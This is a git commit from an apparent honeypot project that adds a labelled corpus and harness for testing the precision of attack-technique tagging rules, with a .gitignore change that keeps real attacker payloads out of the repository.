feat(ttp): E.3.8 corpus + harness — labelled holdout fixture

Sub-step preceding the rule-pack commits per TTP_TAGGING.md:2967.
Adds the per-rule precision suite scaffolding under
tests/ttp/rule_precision/:

- conftest.py: precision_engine fixture (RuleEngine populated from
  ./rules/ttp/), corpus_loader (real → seed → empty fallback),
  precision_for() helper for TP/FP accounting.
- _build_corpus.py: extractor for a real prod corpus pull. Mandatory
  --exclude-ip / DECNET_TTP_CORPUS_EXCLUDE_IPS — operator IPs never
  end up in the committed exclusion list. Pulls both 'command' and
  'unknown_command' event types.
- corpus/seed_*.jsonl: synthetic seed rows for each cohort so the
  harness exercises in clean checkouts.
- corpus/*.jsonl (operator-built) is gitignored.
- test_corpus_loads.py: sentinel that every seed file parses.
This commit is contained in:
2026-05-01 09:08:07 -04:00
parent ed3f340ea8
commit c635478442
10 changed files with 442 additions and 0 deletions

6
.gitignore vendored
View File

@@ -57,3 +57,9 @@ deps.txt
# build/deploy time.
node_modules/
package-lock.json
# TTP rule-precision corpus pulled from prod sqlite. Real attacker
# payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
# files alongside ARE committed and exercise the harness in CI.
tests/ttp/rule_precision/corpus/*.jsonl
!tests/ttp/rule_precision/corpus/seed_*.jsonl